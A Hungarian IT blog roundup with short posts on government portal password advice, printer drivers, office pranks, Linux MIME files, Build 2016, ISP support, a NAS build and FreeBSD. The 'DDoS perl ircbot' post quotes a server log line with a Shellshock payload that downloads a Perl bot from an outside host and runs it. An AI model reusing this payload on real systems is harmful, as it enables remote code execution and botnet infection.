Blogbejegyzések

Ügyfélkapu

Apukám csináltatott ügyfélkapus regisztrációt az okmányirodában kormányablakban, ha már úgyis cserélni kellett okmányokat.

Kapott hozzá egy nyomtatott cetlit azzal, hogy mik a teendők első bejelentkezésnél. Volt rajta egy képernyőkép a bejelentkező ablakról, meg odanyilazott szövegek a tudnivalókkal. Többek között így: 'Az időkódhoz nem nyúl, mert "elszáll" tőle a rendszer... :('

A jelszóval kapcsolatban azt írták, hogy legalább nyolc (8) karakter, köztük kötelezően kis- és nagybetűk valamint számok. (Most tegyük félre egy pillanatra, hogy az ilyesféle megkötéseknek mennyi haszna van.) Az ügyfélszolgálatos hölgy segítőkészen azt tanácsolta apukámnak, hogy válassza az XY123456k jelszót (ahol XY a monogramját helyettesíti), mert azt "el szokta fogadni a gép". (Aztán mégsem ezt választottuk és mégis elfogadta a gép.)

Canon MP210

Tegnap elojott, hogy hasznalni kellene ujra a Canon MP210-es nyomtato/scanner eszkozt. Nosza, a Windows 10-es gephez volt kozelebb, bedugom.

Aszongya, nincs driver. Kenjem a hajamra. Ok, http://canon.com ... utolso driver windows 8.1 32-bit. Amit a win 10 kapabol kidob. (nenek van meg 32 bites rendszere, de komolyan?!)

Na jo, atdugom a melette levo Ubuntu-ba. Gondoltam, majd levadaszom a regi drivert. De nem. Azonnal ment minden. Scanneltem, nyomtattam ahogy kell.

Ubuntu vs Windows 10: 1:0

Az mar csak hab a tortan, hogy az inkjet tintaja (utangyartott) legalabb fel ev (de inkabb egy) utan se szaradt ki, es nyomtatott, mint akinek kotelezo.

Trollkodás IT módra

Először is rettenet jó a hangulat az irodában, például ha úgy felejted a géped tuti néhány munkatársad az ügyfélszolgálatról kap legalább egy szívecskét skype-on (jobb esetben lány) és talán egy randimeghívást is "úgy random". :D
Aztán előfordulhat, hogy néhány monitor az asztalok között keresztbe van bekötve, vagy tele van mindened ragasztgatva postit-tel.
Soso előre rettegek a péntektől, mert úgy érzem el fog szabadulni a pokol. :)

Aztán, hogy magam is trollkodjak egy cseppet.
Itthon a routeremen elő van készítve, hogy néhány hírportál oldala helyett "véletlenül" éppen lakótársamnál a nagy mértékben utált kormánypárt oldala töltődjön be - biztos értékelni fogja. :)

linuxban nincs registry

Ezt persze mind tudjuk. Csak egy adatbázis-szerűség van, amit a freedesktop-társaság üzemeltet a /usr/share/app* könyvtárakban, és ami tulajdonképpen olyan, mint egy registry, csak nem annak hívjuk (kivéve a /usr/share/application-registry-t, amit úgy hívnak).

Például, ha a firefox nem tud mit kezdeni egy swf fájllal (lokális fájlról van szó, mert a http-n érkező swf-fájlra rá tudja küldeni az illetékes plugint), akkor egyesek szerint az az application/vnd.adobe.flash.movie és application/x-shockwave-flash mime-type-ok közötti igazságos háború következménye, és a megoldáshoz valamelyik ilyen nemregistry-fájlban valami meg kell piszkálni valahogy így:

//build/ 2016 keynote tweets

A Xamarin mostantól ingyenesen része a Visual Studionak, a Professional és az Enterprise mellett az ingyenes Community Edition-nek is.

A Xamarin runtime mostantól csatlakozik a .Net Foundation-hoz és opensource.

Azure IoT:
-Azure Functions: írj kódot és futtasd anélkül, hogy annak deploymentjével bármit foglalkoznál.
-Azure IoT Starter Kit
-Kezeld IoT eszközeidet egy sor kód írása nélkül

Az Azure Service Fabric mostantól élesben.
-Age of Ascent, 50000 játékos egy arénában, 126 millió üzenet másodpercenként, .Net Core-ra építve.

AccuWeather
-Big Data: 50 milliárd adatlekérdezés naponta, 2 billió objektum Azure Data lake-ben

UPC meglepetés

Elment a net, hívom az ügyfélszolgálatot, hogy jelentsem a problémát. Kiválasztom a megfelelő menüpontot, kapcsolják a kollégát, köszönés, röviden vázolom a helyzetet: "Úgy tűnik elment az internetem". Kolléga rögtön beolvassa a címem egyeztetésképp, kis türelmet kér, majd mondja hogy központi hiba van, elnézést és türelmet kér öt óráig.

Meglepődtem.

Amit vártam az nem ez, még akkor sem, ha ez így volt korrekt. Sajnos annyira hozzá vagyok szokva a rossz ügyfélkezeléshez, hogy ledöbbentett az, aminek alapnak kellene lennie. Mert egyébként szokás, hogy az automata bekéri az ügyfélkódomat, amit ha elrontok azonnal bontja a vonalat. Szokás hogy miután megadtam, az ügyfélszolgálatosnak szintén el kell mondanom. Szokás az, hogy a telefonszámomat is megkérdezik amiről hívom őket, pedig nem rejtem el a számom, ott kellene előttük lennie. Szokás még a tökölés, a "nem tudom mi történik".

DDoS perl ircbot

/var/log/nginx/default.access.log:103.26.14.7 - - [29/Mar/2016:15:32:47 +0200] "GET / HTTP/1.1" 200 6 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://gazeteterzialan.com/wp-admin/js/t3[dot]log -O /tmp/t3[dot]log;curl -O /tmp/t3.log http://gazeteterzialan.com/wp-admin/js/t3[dot]log;perl /tmp/t3.log;rm -rf /tmp/t3.log*");'"

NapiMalware - avagy mennyire hatékonyak a vírusírtók

Legutóbbi "Szerinted kell Windowsra virusirtó?" szavazás és újra fellángolt "Vírusírtó: belső céges hálózat" fórumbejegyzés apropóján leteszteltem a ma érkezett malwaret a virustotal által elérhető 58 különböző antivirus termékkel. Az AV motorok között megtalálható az összes népszerű - és itt a hupon is ajánlott - víruskergető, az Avasttól a Kasperskyn át a Symantecig.

Naponta jönnek emailben "vírusok" és még maga a Google sem képes hatékonyan kíszűrni őket. A Gmail sok esetben blokkolja a letöltését az olyan csatolmányoknak, amelyek felismerhető kártevőt tartalmaznak, de akár csak ártatlan .exe állományok és jelszavas archívumok fogadását is, próbálva meggátolni ezzel az ismeretlen kártékony programok terjedését és sokszor a hétköznapi munka elvégzését is.

Merevlemez- és rendszerkarbantartás az Ubuntu Linux rendszeren

Ahogyan a windows rendszerek használata során már megismerhettük, a számítógépünk merevlemez meghajtójának rendszeres karbantartása a Linux-rendszereken is csodákat művelhet számunkra - például akár több GByte-nyi lemezterületet is felszabadíthatunk vele.

Ezúton meg fogom mutatni milyen módszereket követve érdemes a Linux-rendszerű meghajtónkat/meghajtóinkat karbantartani.

Disk

Egy új nas születése

Bevezetés
A történet ott kezdődik, hogy volt nekem már egy home serverem. Meg voltam vele elégedve, de szerettem volna egy kisebb házat hozzá, mert az előző sok helyet foglalt.
Ez a beruházás borította az eddigi konfigot, és pár dolgon mindenképp változtatnom kellett.

Ház/táp
A ház egy SILVERSTONE SST-DS380B itx ház lett. 8 merevlemezt lehet belerakni (hot-swap) és elfér benne egy hosszabb raid kártya is. Főként ezért tetszett meg.
Elkezdtem nézelődni a neten, hogy hol lehet kapni. (Kezdődött a mizéria.) Megrendeltem a bluechip webshopban, erre szólnak, hogy nem tudják szállítani, mer már náluk nem kapható. Elkezdtem nézni másik boltot. Rátaláltam rá a merlinhardver boltjára, de tanulva az előző esetből, először felhívtam őket. Azt a választ kaptam, hogy ők nem a nagykertől szerzik be a házat, hanem közvetlenül a gyártótól. Tökjó, megrendeltem, megjött, ajánlom mindenkinek. :)
Az ár egyébként 60 ezer forint volt. Ez nem kevés. Ennyiből microservert lehet venni és ebben nincs benne még a táp sem. Én úgy éreztem mégis ez a nekem való út. Hogy miért? Ne kérdezzétek. :D Mert magam sem tudom igazán. Talán úgy éreztem akkor, hogy a kis serverem megér ennyit.

FreeBSD-10.3-RELEASE

Hivalatos bejegyzést még nem láttam, de összesen 4 gépet megfrissítettem (i386 és Amd64-es is volt közte). Nekem ezt tojta a nyuszi locsolás helyett ;-) Egyelőre annyit látok, hogy megy. AZtán amikor megjelenik a bejelentés is, akkor majd megtudom, hogy ez most nekem miért jó.

Ubuntu 16 / VLC / resume playback

Végre VLC elvileg tudja 2.2 verziótól felfelé a pozícióra emlékezést külön minden média fájlra. Ubuntu 16-ban 2.2.2-es verzió van:
http://packages.ubuntu.com/search?keywords=vlc

Infó innét:
http://addons.videolan.org/content/show.php/Remember+position?content=1…

Szerk.: sajnos nem tudom működésre bírni, pedig elvileg ez az alapértelmezett viselkedés - volt róla bug report és lezárták 1 éve - azt gondolnám mennie kell - még nyomozok.